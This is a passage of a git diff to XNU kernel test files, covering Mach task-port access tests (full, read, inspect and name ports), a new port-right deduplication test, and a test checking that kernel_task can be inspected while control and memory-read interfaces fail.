"task_get_special_port: TASK_KERNEL_PORT", victim); - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_READ_PORT, &name); - check_result(kr, type, POLY, READ, "task_get_special_port: TASK_READ_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_INSPECT_PORT, &name); - check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_INSPECT_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_NAME_PORT, &name); - check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_NAME_PORT", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_HOST_PORT, &name); - check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_HOST_PORT", victim); - if (kr == KERN_SUCCESS) { - if (victim == getpid()) { - mach_port_t host = mach_host_self(); - T_QUIET; T_EXPECT_EQ(host, name, "mach_host_self == task_get_special_port(.. TASK_HOST_PORT)"); - } - } - - name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &name); - check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_BOOTSTRAP_PORT", victim); - - /************ TEST IPC_SPACE_READ AND IPC_SPACE_INSPECT ************/ - if (victim == getpid()) { - mach_port_status_t status; - mach_msg_type_number_t statusCnt = MACH_PORT_LIMITS_INFO_COUNT; - kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, 0, "mach_port_allocate should succeed"); - - kr = mach_port_get_attributes(port, name, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&status, &statusCnt); - check_result(kr, type, POLY, READ, "mach_port_get_attributes", victim); - - mach_port_context_t context; - kr = mach_port_get_context(port, name, &context); - check_result(kr, type, POLY, READ, "mach_port_get_context", victim); - - kr = mach_port_destruct(mach_task_self(), name, 0, 0); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct"); - } - - ipc_info_space_basic_t sinfo; - kr = mach_port_space_basic_info(port, &sinfo); - check_result(kr, type, INSPECT, INSPECT, "mach_port_space_basic_info", victim); - - /************ MACH_PORT_ALLOCATE ************/ - - mach_port_t new_port = MACH_PORT_NULL; - kr = mach_port_allocate(port, MACH_PORT_RIGHT_RECEIVE, &new_port); - check_result(kr, type, FULL, FULL, "mach_port_allocate", victim); - if (kr == KERN_SUCCESS) { - kr = mach_port_destruct(port, new_port, 0, 0); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_destruct"); - } - - /************ INSPECT INTERFACES ************/ - int counts[2]; - mach_msg_type_number_t size = TASK_INSPECT_BASIC_COUNTS_COUNT; - kr = task_inspect(port, TASK_INSPECT_BASIC_COUNTS, counts, &size); - check_result(kr, type, INSPECT, INSPECT, "task_inspect", victim); - - /************ TASK_SET_SPECIAL_PORT ************/ - - if (type == FULL) { - new_port = MACH_PORT_NULL; - kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &new_port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_allocate"); - kr = mach_port_insert_right(mach_task_self(), new_port, new_port, MACH_MSG_TYPE_MAKE_SEND); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_insert_right"); - - mach_port_t backup; - kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &backup); - check_result(kr, type, POLY, FULL, "task_get_special_port", victim); - kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, new_port); - check_result(kr, type, FULL, FULL, "task_set_special_port", victim); - kr = task_set_special_port(port, TASK_BOOTSTRAP_PORT, backup); - check_result(kr, type, FULL, FULL, "task_set_special_port", victim); - - kr = mach_port_deallocate(mach_task_self(), new_port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - mach_port_mod_refs(mach_task_self(), new_port, MACH_PORT_RIGHT_RECEIVE, -1); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_mod_refs"); - } - /************ TASK_THREADS ************/ - thread_array_t th_list; - mach_msg_type_number_t th_cnt = 0; - - kr = task_threads(port, &th_list, &th_cnt); - check_result(kr, type, POLY, INSPECT, "task_threads", victim); - - /* Skip thread ports tests if task_threads() fails */ - if (kr != KERN_SUCCESS) { - return; - } - - /************ THREAD_GET_SPECIAL_PORT ************/ - mach_port_t special = MACH_PORT_NULL; - - switch (type) { - case FULL: - kr = thread_get_special_port(th_list[0], THREAD_KERNEL_PORT, &special); - break; - case READ: - kr = thread_get_special_port(th_list[0], THREAD_READ_PORT, &special); - break; - case INSPECT: - kr = thread_get_special_port(th_list[0], THREAD_INSPECT_PORT, &special); - break; - default: - break; - } - - T_QUIET; T_EXPECT_EQ(special, th_list[0], "thread_get_special_port should match task_threads"); - - kr = mach_port_deallocate(mach_task_self(), special); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - for (unsigned int i = 0; i < th_cnt; i++) { - test_thread_port(th_list[i], type, victim); /* polymorphic */ - kr = mach_port_deallocate(mach_task_self(), th_list[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } -} - -static void -test_get_child_port(int with_sleep) -{ - pid_t child_pid; - kern_return_t kr; - mach_port_name_t tr, ti, tp, tn; - - child_pid = fork(); - - if (child_pid < 0) { - T_FAIL("fork failed in test_get_child_port."); - } - - if (child_pid == 0) { - while (1) { - sleep(10); - } - } - - kr = task_for_pid(mach_task_self(), child_pid, &tp); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tfpFail++; - } - - kr = task_read_for_pid(mach_task_self(), child_pid, &tr); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_trfpFail++; - } - - kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tifpFail++; - } - - kr = task_name_for_pid(mach_task_self(), child_pid, &tn); - if (with_sleep) { - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid); - } else if (kr != 0) { - g_tnfpFail++; - } - - kr = mach_port_deallocate(mach_task_self(), tp); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tr); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), ti); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tn); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kill(child_pid, SIGKILL); - int status; - wait(&status); -} - -static void -test_child_exec() -{ - pid_t child_pid; - kern_return_t kr; - mach_port_name_t tr2, ti2, tp2, tn2; - - child_pid = fork(); - - if (child_pid < 0) { - T_FAIL("fork failed in test_child_exec."); - } - - if (child_pid == 0) { - execve("/bin/bash", NULL, NULL); - } - - sleep(10); - - kr = task_name_for_pid(mach_task_self(), child_pid, &tn2); - test_task_port(tn2, NAME); - - kr = task_for_pid(mach_task_self(), child_pid, &tp2); - test_task_port(tp2, FULL); - - kr = task_read_for_pid(mach_task_self(), child_pid, &tr2); - test_task_port(tr2, READ); - - kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti2); - test_task_port(ti2, INSPECT); - - kr = mach_port_deallocate(mach_task_self(), tp2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tr2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), ti2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - kr = mach_port_deallocate(mach_task_self(), tn2); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kill(child_pid, SIGKILL); - int status; - wait(&status); -} - -static void * -thread_run() -{ - pthread_mutex_lock(&g_lock); - pthread_mutex_unlock(&g_lock); - - pthread_exit(NULL); - - return NULL; -} - -#ifdef T_NOCODESIGN -#define TEST_NAME inspect_read_port_nocodesign -#else -#define TEST_NAME inspect_read_port -#endif - -T_DECL(TEST_NAME, "inspect and read port test", T_META_ASROOT(true)) -{ - kern_return_t kr; - pid_t pid = 0; - mach_port_t port = MACH_PORT_NULL; - - kr = pid_for_task(mach_task_self(), &pid); - T_EXPECT_MACH_SUCCESS(kr, "pid_for_task: My Pid = %d", pid); - -#ifdef T_NOCODESIGN - T_LOG("Running as non-platform binary...\n"); -#else - T_LOG("Running as platform binary...\n"); -#endif - - kr = task_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_for_pid(mach_task_self..): %u", port); - T_EXPECT_EQ(port, mach_task_self(), "task_for_pid == mach_task_self"); - test_task_port(port, FULL); - - port = MACH_PORT_NULL; - kr = task_read_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_read_for_pid(mach_task_self..): read port = %u", port); - test_task_port(port, READ); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_inspect_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_inspect_for_pid(mach_task_self..): inspect port = %u", port); - test_task_port(port, INSPECT); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_name_for_pid(mach_task_self(), pid, &port); - T_EXPECT_EQ(kr, 0, "task_name_for_pid(mach_task_self..): name port = %u", port); - test_task_port(port, NAME); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - port = MACH_PORT_NULL; - kr = task_read_for_pid(mach_task_self(), 0, &port); - T_EXPECT_NE(kr, 0, "task_read_for_pid for kernel should fail"); - - /* task_read_for_pid loop, check for leaks */ - for (int i = 0; i < 0x1000; i++) { - kr = task_read_for_pid(mach_task_self(), pid, &port); - test_task_port(port, READ); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - /* task_inspect_for_pid loop, check for leaks */ - for (int i = 0; i < 0x1000; i++) { - kr = task_inspect_for_pid(mach_task_self(), pid, &port); - test_task_port(port, INSPECT); - kr = mach_port_deallocate(mach_task_self(), port); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - /* fork-exec a child process */ - test_child_exec(); - - /* fork, get full/read/inspect/name port for the child then kill it */ - for (int i = 0; i < 10; i++) { - test_get_child_port(TRUE); - } - - T_LOG("tfp fail: %d, trfp fail: %d, tifp fail: %d, tnfp fail: %d, TOTAL: 10\n", - g_tfpFail, g_trfpFail, g_tifpFail, g_tnfpFail); - - - /* task thread loop, check for leaks */ - thread_array_t th_list; - mach_msg_type_number_t th_cnt; - pthread_t thread; - - pthread_mutex_init(&g_lock, NULL); - pthread_mutex_lock(&g_lock); - - for (unsigned i = 0; i < 0x100; i++) { - pthread_create(&thread, NULL, thread_run, NULL); - } - - for (unsigned i = 0; i < 0x1000; i++) { - kr = task_threads(mach_task_self(), &th_list, &th_cnt); - T_QUIET; T_ASSERT_EQ(th_cnt, 0x101, "257 threads"); - - for (unsigned j = 0; j < th_cnt; j++) { - kr = mach_port_deallocate(mach_task_self(), th_list[j]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - } - pthread_mutex_unlock(&g_lock); - - /* processor_set_tasks_with_flavor */ - - processor_set_name_array_t psets; - processor_set_t pset; - task_array_t tasks; - mach_msg_type_number_t pcnt, tcnt; - mach_port_t host = mach_host_self(); - - kr = host_processor_sets(host, &psets, &pcnt); - kr = host_processor_set_priv(host, psets[0], &pset); - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_CONTROL, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_CONTROL should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], FULL); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_READ should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], READ); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_INSPECT, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_INSPECT should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], INSPECT); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = processor_set_tasks_with_flavor(pset, TASK_FLAVOR_NAME, &tasks, &tcnt); - T_EXPECT_EQ(kr, 0, "processor_set_tasks_with_flavor: TASK_FLAVOR_NAME should succeed"); - for (unsigned int i = 0; i < tcnt; i++) { - test_task_port(tasks[i], NAME); - kr = mach_port_deallocate(mach_task_self(), tasks[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - // Cleanup - for (unsigned int i = 0; i < pcnt; i++) { - kr = mach_port_deallocate(mach_task_self(), psets[i]); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - } - - kr = mach_port_deallocate(mach_task_self(), pset); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); -} diff --git a/tests/ipc_mach_port.c b/tests/ipc_mach_port.c new file mode 100644 index 000000000..b17dbc0f5 --- /dev/null +++ b/tests/ipc_mach_port.c @@ -0,0 +1,190 @@ +#include +#include +#include +#include +#include +#include "exc_helpers.h" + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +#pragma mark - helpers + +#define SERVICE_NAME "com.apple.xnu.test.mach_port" + +struct one_port_msg { + mach_msg_header_t header; + mach_msg_body_t body; + mach_msg_port_descriptor_t port_descriptor; + mach_msg_trailer_t trailer; // subtract this when sending +}; + +static mach_port_t +server_checkin(void) +{ + mach_port_t mp; + kern_return_t kr; + + kr = bootstrap_check_in(bootstrap_port, SERVICE_NAME, &mp); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in"); + return mp; +} + +static mach_port_t +server_lookup(void) +{ + mach_port_t mp; + kern_return_t kr; + + kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &mp); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "bootstrap_look_up"); + return mp; +} + +static mach_port_t +make_sr_port(void) +{ + mach_port_options_t opts = { + .flags = MPO_INSERT_SEND_RIGHT, + }; + kern_return_t kr; + mach_port_t port; + + kr = mach_port_construct(mach_task_self(), &opts, 0ull, &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_construct"); + return port; +} + +static void +destroy_port(mach_port_t port, bool receive, int srights) +{ + kern_return_t kr; + + if (srights) { + kr = mach_port_mod_refs(mach_task_self(), port, + MACH_PORT_RIGHT_SEND, -srights); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "srights -= %d", srights); + } + if (receive) { + kr = mach_port_mod_refs(mach_task_self(), port, + MACH_PORT_RIGHT_RECEIVE, -1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive -= 1"); + } +} + +static void +send_port( + mach_msg_id_t id, + mach_port_t dest, + mach_port_t right, + mach_msg_type_name_t disp) +{ + struct one_port_msg msg = { + .header = { + .msgh_remote_port = dest, + .msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, + 0, MACH_MSG_TYPE_MOVE_SEND, MACH_MSGH_BITS_COMPLEX), + .msgh_id = id, + .msgh_size = offsetof(struct one_port_msg, trailer), + }, + .body = { + .msgh_descriptor_count = 1, + }, + .port_descriptor = { + .name = right, + .disposition = disp, + .type = MACH_MSG_PORT_DESCRIPTOR, + }, + }; + kern_return_t kr; + + kr = mach_msg(&msg.header, MACH_SEND_MSG | MACH_SEND_TIMEOUT, + msg.header.msgh_size, 0, MACH_PORT_NULL, 10000, 0); + + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "send(%d)", id); +} + +#pragma mark - basic test about right deduplication + +static mach_port_t +receive_port( + mach_msg_id_t expected_id, + mach_port_t rcv_port, + mach_msg_type_name_t expected_disp) +{ + struct one_port_msg msg = { }; + kern_return_t kr; + + T_LOG("waiting for message %d", expected_id); + kr = mach_msg(&msg.header, MACH_RCV_MSG, 0, + sizeof(msg), rcv_port, 0, 0); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive(%d)", expected_id); + T_QUIET; T_ASSERT_EQ(msg.header.msgh_id, expected_id, "message id matches"); + T_QUIET; T_ASSERT_NE(msg.header.msgh_bits & MACH_MSGH_BITS_COMPLEX, 0, + "message is complex"); + T_QUIET; T_ASSERT_EQ(msg.body.msgh_descriptor_count, 1, "message has one right"); + T_QUIET; T_ASSERT_EQ(msg.port_descriptor.disposition, expected_disp, + "port has right disposition"); + return msg.port_descriptor.name; +} + +T_HELPER_DECL(right_dedup_server, "right_dedup_server") +{ + mach_port_t svc_port = server_checkin(); + mach_port_t ports[3]; + + ports[0] = receive_port(1, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + ports[1] = receive_port(2, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[2] = receive_port(3, svc_port, MACH_MSG_TYPE_MOVE_SEND); + T_ASSERT_EQ(ports[0], ports[1], "receive, send, send"); + T_ASSERT_EQ(ports[0], ports[2], "receive, send, send"); + destroy_port(ports[0], true, 2); + + ports[0] = receive_port(4, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[1] = receive_port(5, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + ports[2] = receive_port(6, svc_port, MACH_MSG_TYPE_MOVE_SEND); + T_ASSERT_EQ(ports[0], ports[1], "send, receive, send"); + T_ASSERT_EQ(ports[0], ports[2], "send, receive, send"); + destroy_port(ports[0], true, 2); + + ports[0] = receive_port(7, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[1] = receive_port(8, svc_port, MACH_MSG_TYPE_MOVE_SEND); + ports[2] = receive_port(9, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE); + T_ASSERT_EQ(ports[0], ports[1], "send, send, receive"); + T_ASSERT_EQ(ports[0], ports[2], "send, send, receive"); + destroy_port(ports[0], true, 2); + + T_END; +} + +T_HELPER_DECL(right_dedup_client, "right_dedup_client") +{ + mach_port_t svc_port = server_lookup(); + mach_port_t port; + + port = make_sr_port(); + send_port(1, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); + send_port(2, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(3, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + + port = make_sr_port(); + send_port(4, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(5, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); + send_port(6, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + + port = make_sr_port(); + send_port(7, svc_port, port, MACH_MSG_TYPE_COPY_SEND); + send_port(8, svc_port, port, MACH_MSG_TYPE_MOVE_SEND); + send_port(9, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE); +} + +T_DECL(right_dedup, "make sure right deduplication works") +{ + dt_helper_t helpers[] = { + dt_launchd_helper_domain("com.apple.xnu.test.mach_port.plist", + "right_dedup_server", NULL, LAUNCH_SYSTEM_DOMAIN), + dt_fork_helper("right_dedup_client"), + }; + dt_run_helpers(helpers, 2, 600); +} diff --git a/tests/kdebug.c b/tests/kdebug.c index 6aacdccc0..e6de871d9 100644 --- a/tests/kdebug.c +++ b/tests/kdebug.c @@ -19,6 +19,7 @@ #include #include "ktrace_helpers.h" +#include "test_utils.h" T_GLOBAL_META( T_META_NAMESPACE("xnu.ktrace"), @@ -623,25 +624,6 @@ static const uint32_t noprocfilt_evts[EXP_KERNEL_EVENTS] = { BSDDBG_CODE(DBG_BSD_KDEBUG_TEST, 19), }; -static bool -is_development_kernel(void) -{ - static dispatch_once_t is_development_once; - static bool is_development; - - dispatch_once(&is_development_once, ^{ - int dev; - size_t dev_size = sizeof(dev); - - T_QUIET; - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, - &dev_size, NULL, 0), NULL); - is_development = (dev != 0); - }); - - return is_development; -} - static void expect_event(struct trace_point *tp, const char *name, unsigned int *events, const uint32_t *event_ids, size_t event_ids_len) diff --git a/tests/kernel_inspection.c b/tests/kernel_inspection.c new file mode 100644 index 000000000..6fa087d99 --- /dev/null +++ b/tests/kernel_inspection.c @@ -0,0 +1,207 @@ +#ifdef T_NAMESPACE +#undef T_NAMESPACE +#endif + +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(true)); + +/* + * Attempt to inspect kernel_task using a task_inspect_t. Interact with the + * kernel in the same way top(1) and lsmp(1) do. + */ + +static int found_kernel_task = 0; + +static void +check_secure_kernel(void) +{ + int secure_kern = 0; + size_t secure_kern_size = sizeof(secure_kern); + + T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern, + &secure_kern_size, NULL, 0), NULL); + + if (secure_kern) { + T_SKIP("secure kernel: processor_set_tasks will not return kernel_task"); + } +} + +static void +attempt_kernel_inspection(task_t task) +{ + pid_t pid = (pid_t)-1; + mach_msg_type_number_t i, count, thcnt; + struct task_basic_info_64 ti; + thread_act_array_t threads; + + if (pid_for_task(task, &pid)) { + return; + } + + T_QUIET; T_LOG("Checking pid %d", pid); + + if (pid != 0) { + return; + } + + T_LOG("found kernel_task, attempting to inspect"); + found_kernel_task++; + + count = TASK_BASIC_INFO_64_COUNT; + T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti, + &count), "task_info(... TASK_BASIC_INFO_64 ...)"); + + T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads"); + T_LOG("Found %d kernel threads.", thcnt); + for (i = 0; i < thcnt; i++) { + kern_return_t kr; + thread_basic_info_data_t basic_info; + mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT; + + kr = thread_info(threads[i], THREAD_BASIC_INFO, + (thread_info_t)&basic_info, &bi_count); + /* + * Ignore threads that have gone away. + */ + if (kr == MACH_SEND_INVALID_DEST) { + T_LOG("ignoring thread that has been destroyed"); + continue; + } + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)"); + + /* Now try out READ (skip eval) interfaces on kernel thread */ + mach_msg_type_number_t msk_count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + kr = thread_get_exception_ports_info(threads[i], EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info() on kernel thread: 0x%x", kr); + + /* READ (with eval) interfaces should fail */ + mach_port_t voucher; + kr = thread_get_mach_voucher(threads[i], 0, &voucher); + T_QUIET; T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "thread_get_mach_voucher() should fail with KERN_INVALID_ARGUMENT"); + + (void)mach_port_deallocate(mach_task_self(), threads[i]); + } + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)threads, + thcnt * sizeof(*threads)); + + ipc_info_space_basic_t basic_info; + T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info"); + + ipc_info_space_t info_space; + ipc_info_name_array_t table; + ipc_info_tree_name_array_t tree; + mach_msg_type_number_t tblcnt = 0, treecnt = 0; + T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table, + &tblcnt, &tree, &treecnt), "mach_port_space_info"); + if (tblcnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)table, + tblcnt * sizeof(*table)); + } + if (treecnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tree, + treecnt * sizeof(*tree)); + } + + /* Now try out READ (skip eval) interfaces on kernel task */ + mach_msg_type_number_t msk_count = EXC_TYPES_COUNT; + exception_mask_t masks[EXC_TYPES_COUNT]; + ipc_info_port_t ports_info[EXC_TYPES_COUNT]; + exception_behavior_t behaviors[EXC_TYPES_COUNT]; + thread_state_flavor_t flavors[EXC_TYPES_COUNT]; + kern_return_t kr = task_get_exception_ports_info(task, EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors); + T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info() on kernel_task: 0x%x", kr); + + /* READ (with eval) interfaces should fail */ + vm_offset_t data; + mach_msg_type_number_t cnt; + mach_vm_address_t addr = 0x10000000; /* can be whatever, the call should fail before getting to VM */ + + kr = mach_vm_read(task, (mach_vm_address_t)addr, 8, &data, &cnt); + T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "mach_vm_read() should fail with KERN_INVALID_ARGUMENT"); + + mach_port_t voucher; + kr = task_get_mach_voucher(task, 0, &voucher); + T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_get_mach_voucher() should fail with KERN_INVALID_TASK"); + + /* Control interfaces should absolutely fail */ + kr = task_set_mach_voucher(task, mach_task_self()); /* voucher arg is unused, can be whatever port */ + T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_set_mach_voucher() should fail with KERN_INVALID_TASK"); +} + +T_DECL(inspect_kernel_task, + "ensure that kernel task can be inspected", + T_META_CHECK_LEAKS(false), + T_META_ASROOT(true)) +{ + processor_set_name_array_t psets; + processor_set_t pset; + task_array_t tasks; + mach_msg_type_number_t i, j, tcnt, pcnt = 0; + mach_port_t self = mach_host_self(); + + check_secure_kernel(); + + T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt), + NULL); + + for (i = 0; i < pcnt; i++) { + T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL); + T_LOG("Checking pset %d/%d", i, pcnt - 1); + + tcnt = 0; + T_LOG("Attempting kernel inspection with control port..."); + T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL); + + for (j = 0; j < tcnt; j++) { + attempt_kernel_inspection(tasks[j]); + mach_port_deallocate(self, tasks[j]); + } + + /* free tasks array */ + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tasks, + tcnt * sizeof(*tasks)); + + T_LOG("Attempting kernel inspection with read port..."); + T_ASSERT_MACH_SUCCESS(processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt), NULL); + + for (j = 0; j < tcnt; j++) { + attempt_kernel_inspection(tasks[j]); + mach_port_deallocate(self, tasks[j]); + } + + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tasks, + tcnt * sizeof(*tasks)); + + mach_port_deallocate(mach_task_self(), pset); + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)psets, + pcnt * sizeof(*psets)); + + if (found_kernel_task != 2) { + /* One for kernel control port test, one for kernel read port test. */ + T_FAIL("could not find kernel_task in list of tasks returned"); + } +} diff --git a/tests/kqueue_file_tests.c b/tests/kqueue_file_tests.c index 6293e16c8..504b074d8 100644 --- a/tests/kqueue_file_tests.c +++ b/tests/kqueue_file_tests.c @@ -534,6 +534,7 @@ execute_test(test_t *test) if ((filefd = open(test->t_watchfile, O_RDONLY | O_SYMLINK)) == -1) { T_LOG("open() of watchfile %s failed: %d (%s)\n", test->t_watchfile, errno, strerror(errno)); + res = -1; } } @@ -610,9 +611,6 @@ execute_test(test_t *test) if (test->t_file_is_fifo) { close(writefd); } - } else { - T_LOG("Couldn't open test file %s to monitor: %d (%s)\n", test->t_watchfile); - res = -1; } if (!test->t_is_poll_test) { close(kqfd); diff --git 